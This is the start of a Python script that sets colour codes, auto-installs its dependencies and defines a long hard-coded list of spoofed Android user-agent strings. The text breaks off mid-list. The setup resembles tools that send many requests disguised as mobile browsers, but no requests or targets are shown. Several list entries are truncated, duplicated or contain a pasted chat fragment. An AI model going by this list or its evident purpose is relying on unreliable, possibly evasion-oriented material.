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= '\033[97;1m'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= '\033[91;1m'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= '\033[92;1m'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= '\033[93;1m'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'\033[94;1m'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= '\033[95;1m'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'\033[96;1m'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'\x1b[0m'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import requests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ImportError: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os.system("pip install requests")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import concurrent.futures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ImportError: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os.system("pip install futures")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requests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platform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base64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subprocess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concurrent.futures import ThreadPoolExecutor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requests,bs4,uuid,json,os,sys,random,datetime,time,re,subprocess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import rich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ImportError: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os.system('pip install rich')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time.sleep(1)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import rich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except ImportError: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exit(' [×] Cant Install Rich Module, Try Manual Install (pip install rich)')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rich.table import Table as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rich.console import Console as sol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bs4 import BeautifulSoup as sop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concurrent.futures import ThreadPoolExecutor as tred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rich.console import Group as gp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rich.panel import Panel as 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base64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rich import print as cetak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rich.markdown import Markdown as mark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rich.columns import Columns as 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urllib.parse import quote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UA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#ugen2=open('frec.txt','r').read().splitlines()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#ugen=open('m.txt','r').read().splitlines()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ugen2=['Mozilla/5.0 (Android 2.2; id-id; HTC Desire)/GoBrowser','Mozilla/5.0 (Android 2.2; id-id; HTC Desire)/GoBrowser']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ugen=['Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-P610) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/13.0 Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-P610) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N971N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-N970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 1…', '[18.36, 15/3/2022] AOREC: Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SCV45) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; en-au; SC-04L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N980F/N980FXXU1DUB5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N971N/KSU1FUCD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au;  SAMSUNG SM-M625F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au;  SAMSUNG SM-G988B/G988BXXU7DUC7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au;  SAMSUNG SM-A8050) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG IN2020) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SC-42A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T597W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-N960F/N960FXXS8FUC4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G988U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A600FN/A600FNXXU6CTF2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A515F/A515FXXU2ATB1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A505FN 6/128) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/13.2 Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A105M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A013F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-N935S) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-M205G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J530GM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A530F/A530FXXU4CSC6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-T835) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G960F/G960FXXS2BRK3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G960F/G960FXXS2BRK3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-G935F/G935FXXS2DRAA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-G920K/KKS3ETJ1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-C9000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-P610) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-P610) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N971N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N770F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M317F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M317F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M307FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M307F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G973U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A716U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A505FM) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J720M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; Pixel C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; NX659J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-M107F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A102U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0; en-au; SAMSUNG SM-G965F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.1.1; en-au; SAMSUNG SM-G550FY) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-N9200) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; FRD-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.106 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-T870) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-P615) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N985F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N971N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N970F/N970FXXS6EUA1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N770F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M317F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M315F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M307F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G977N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G781B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-F700F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; CPH2009) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G980F/G980FXXU3ATFG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G973F/G973FXXS3BSL4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G960F/G960FXXSDFTL1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A908N/KSU3CTL3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A505FN/A505FNXXS6BUA5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A426B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A217F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.99 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A015F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-J710F/J710FXXS6CTJ2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-J327R6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-J330FN/J330FNXXU3BRL1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A530F/A530FXXU3BRL8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A530F/A530FXXS3BRH1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-J327U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-J710F/J710FXXS6CTJ2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-J327R6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-J330FN/J330FNXXU3BRL1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A530F/A530FXXS3BRH1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-J327U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 5.1.1; en-au; SAMSUNG SM-J320FN/J320FNXXU0ARE1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M315F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11 en-au;; SAMSUNG SM-M307FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M307F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G980F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A515F/A515FXXU4DUB2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T725) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-S111DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-M105G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J610G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J610FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J400M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-G965N/KSU3FTJ2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-F700U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A202F/A202FXXS3BTI2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A115M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A105FN/A105FNXXS4BTG1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-T827V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J260A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A307GT) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A107F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-T585/T585XXS5CSH1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-J610F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-G925K/KKU3ERG1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 5.0.2; en-au; SAMSUNG SM-P905) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M317F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M315F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-M215F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G985F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A505GN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T505) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T307U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-M317F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-M307FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-J400F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A405FN/A405FNXXS3BTI3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-A207F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J810F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-J330FN/J330FNXXU4CTH2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-G950F/G950FXXSBDUA3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 9; en-au; SAMSUNG SM-A605FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.93 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.1.0; en-au; SAMSUNG SM-M105F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-G960W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 8.0.0; en-au; SAMSUNG SM-A520F/A520FXXUGCTI9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-G935W8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-C7000) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 7.0; en-au; SAMSUNG SM-A310F/A310FXXS5CTK1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-T805M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 6.0.1; en-au; SAMSUNG SM-G900F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au;SAMSUNG SM-N9750) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au;SAMSUNG SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G988B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A405FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-N975F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G988B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 11; en-au; SAMSUNG SM-A405FN) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T295) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; SAMSUNG SM-T290) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Safari/537.36', 'Mozilla/5.0 (Linux; Android 10; en-au; 